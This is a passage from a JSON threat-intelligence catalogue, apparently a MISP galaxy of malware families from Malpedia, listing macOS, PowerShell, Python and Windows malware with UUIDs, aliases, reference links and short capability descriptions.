"meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" ], "synonyms": [], "type": [] }, "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", "value": "OceanLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", "https://news.drweb.com/show/?i=1750&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", "value": "Olyx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" ], "synonyms": [ "FileCoder", "Findzip" ], "type": [] }, "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", "value": "Patcher" }, { "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", "https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/" ], "synonyms": [], "type": [] }, "uuid": "de13bec0-f443-4c5a-91fe-2223dad43be5", "value": "PintSized" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf" ], "synonyms": [], "type": [] }, "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", "value": "Pirrit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", "https://securelist.com/calisto-trojan-for-macos/86543/", "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", "https://objective-see.com/blog/blog_0x1F.html", "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://objective-see.com/blog/blog_0x1D.html", "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" ], "synonyms": [ "Calisto" ], "type": [] }, "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", "value": "Proton RAT" }, { "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" ], "synonyms": [], "type": [] }, "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", "value": "Pwnet" }, { "description": "Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" ], "synonyms": [ "Retefe" ], "type": [] }, "uuid": "80acc956-d418-42e3-bddf-078695a01289", "value": "Dok" }, { "description": "General purpose backdoor", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" ], "synonyms": [], "type": [] }, "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", "value": "systemd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami", "https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks" ], "synonyms": [], "type": [] }, "uuid": "59d4a2f3-c66e-4576-80ab-e04a4b0a4317", "value": "Tsunami (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" ], "synonyms": [], "type": [] }, "uuid": "13173d75-45f0-4183-8e18-554a5781405c", "value": "Uroburos (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail", "https://objective-see.com/blog/blog_0x3D.html", "https://objective-see.com/blog/blog_0x3B.html", "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/", "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf" ], "synonyms": [], "type": [] }, "uuid": "48751182-0b17-4326-8a72-41e4c4be35e7", "value": "WindTail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", "https://401trg.pw/winnti-evolution-going-open-source/", " https://401trg.pw/an-update-on-winnti/" ], "synonyms": [], "type": [] }, "uuid": "5aede44b-1a30-4062-bb97-ac9f4985ddb6", "value": "Winnti (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", "https://objective-see.com/blog/blog_0x16.html", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" ], "synonyms": [], "type": [] }, "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", "value": "WireLurker (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "f99ef0dc-9e96-42e0-bbfe-3616b3786629", "value": "Wirenet (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", "https://twitter.com/PhysicalDrive0/status/845009226388918273", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf" ], "synonyms": [], "type": [] }, "uuid": "858f4396-8bc9-4df8-9370-490bbb3b4535", "value": "X-Agent (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", "value": "XSLCmd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort", "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/" ], "synonyms": [], "type": [] }, "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b", "value": "Yort" }, { "description": "Antak is a webshell written in ASP.Net which utilizes PowerShell.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak", "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx", "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html" ], "synonyms": [], "type": [] }, "uuid": "88a71ca8-d99f-416a-ad29-5af12212008c", "value": "ANTAK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" ], "synonyms": [], "type": [] }, "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", "value": "PAS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", "https://github.com/wso-shell", "https://securelist.com/energetic-bear-crouching-yeti/85345/" ], "synonyms": [ "Webshell by Orb" ], "type": [] }, "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", "value": "WSO" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", "value": "Silence DDoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [ "Glimpse" ], "type": [] }, "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", "value": "BONDUPDATER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" ], "synonyms": [], "type": [] }, "uuid": "0db05333-2214-49c3-b469-927788932aaa", "value": "GhostMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig", "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html", "https://twitter.com/MJDutch/status/1074820959784321026?s=19" ], "synonyms": [], "type": [] }, "uuid": "4a3b9669-8f91-47df-a8bf-a9876ab8edf3", "value": "OilRig" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", "https://github.com/matthewdunwoody/POSHSPY" ], "synonyms": [], "type": [] }, "uuid": "4df1b257-c242-46b0-b120-591430066b6f", "value": "POSHSPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] }, "uuid": "60d7f668-66b6-401b-976f-918470a23c3d", "value": "POWERPIPE" }, { "description": "POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource", "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" ], "synonyms": [], "type": [] }, "uuid": "a4584181-f739-43d1-ade9-8a7aa21278a0", "value": "POWERSOURCE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], "type": [] }, "uuid": "c07f6484-0669-44b7-90e6-f642e316d277", "value": "PowerSpritz" }, { "description": "POWERSTATS is a backdoor written in powershell.\r\nIt has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats", "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/", "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/", "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/", "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/", "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/" ], "synonyms": [ "Valyria" ], "type": [] }, "uuid": "b81d91b5-23a4-4f86-aea9-3f212169fce9", "value": "POWERSTATS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" ], "synonyms": [], "type": [] }, "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", "value": "PowerWare" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" ], "synonyms": [], "type": [] }, "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", "value": "POWRUNER" }, { "description": "The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox", "https://twitter.com/kafeine/status/1092000556598677504" ], "synonyms": [], "type": [] }, "uuid": "c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8", "value": "PresFox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] }, "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", "value": "QUADAGENT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" ], "synonyms": [], "type": [] }, "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", "value": "RogueRobin" }, { "description": "sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" ], "synonyms": [], "type": [] }, "uuid": "e78c0259-9299-4e55-b934-17c6a3ac4bc2", "value": "sLoad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", "https://github.com/Kevin-Robertson/Tater" ], "synonyms": [], "type": [] }, "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", "value": "Tater PrivEsc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", "https://github.com/Mr-Un1k0d3r/ThunderShell" ], "synonyms": [], "type": [] }, "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", "value": "ThunderShell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" ], "synonyms": [], "type": [] }, "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", "value": "WMImplant" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f", "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", "http://seclists.org/fulldisclosure/2017/Mar/7" ], "synonyms": [], "type": [] }, "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", "value": "BrickerBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], "type": [] }, "uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa", "value": "pupy (Python)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", "https://www.youtube.com/watch?v=Bk-utzAlYFI" ], "synonyms": [], "type": [] }, "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", "value": "Saphyra" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "9f85f4fc-1cce-4557-b3d8-b9ef522fafb2", "value": "FlexiSpy (symbian)" }, { "description": "The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information.\r\nHALFBAKED listens for the following commands from the C2 server:\r\n\r\n info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI \r\n queries\r\n processList: Send list of process running\r\n screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)\r\n runvbs: Executes a VB script\r\n runexe: Executes EXE file\r\n runps1: Executes PowerShell script\r\n delete: Delete the specified file\r\n update: Update the specified file", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked", "https://attack.mitre.org/software/S0151/", "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" ], "synonyms": [], "type": [] }, "uuid": "095c995c-c916-488e-944d-a3f4b9842926", "value": "HALFBAKED" }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" ], "synonyms": [], "type": [] }, "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", "value": "7ev3n" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" ], "synonyms": [ "Hydraq", "McRAT" ], "type": [] }, "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", "value": "9002 RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/", "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" ], "synonyms": [ "PinkKite" ], "type": [] }, "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", "value": "AbaddonPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes", "https://github.com/ElektroKill/AbantesTrojan" ], "synonyms": [], "type": [] }, "uuid": "27b54000-26b5-405f-9296-9fbc9217a8c9", "value": "abantes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" ], "synonyms": [], "type": [] }, "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", "value": "Abbath Banker" }, { "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" ], "synonyms": [], "type": [] }, "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", "value": "AcridRain" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" ], "synonyms": [], "type": [] }, "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", "value": "Acronym" }, { "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016", "https://twitter.com/JaromirHorejsi/status/813712587997249536" ], "synonyms": [], "type": [] }, "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", "value": "AdamLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" ], "synonyms": [], "type": [] }, "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", "value": "AdKoob" }, { "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" ], "synonyms": [], "type": [] }, "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", "value": "AdvisorsBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" ], "synonyms": [], "type": [] }, "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", "value": "Adylkuzz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat" ], "synonyms": [ "ComRAT", "Sun rootkit" ], "type": [] }, "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", "value": "Agent.BTZ" }, { "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" ], "synonyms": [], "type": [] }, "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", "value": "Agent Tesla" }, { "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" ], "synonyms": [], "type": [] }, "uuid": "43ec8adc-0658-4765-be20-f22679097fab", "value": "Aldibot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/", "https://www.s21sec.com/en/blog/2017/01/alice-simplicity-for-atm-jackpotting/", "https://www.symantec.com/security-center/writeup/2016-122104-0203-99" ], "synonyms": [ "AliceATM", "PrAlice" ], "type": [] }, "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", "value": "Project Alice" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", "https://www.nuix.com/blog/alina-continues-spread-its-wings", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/", 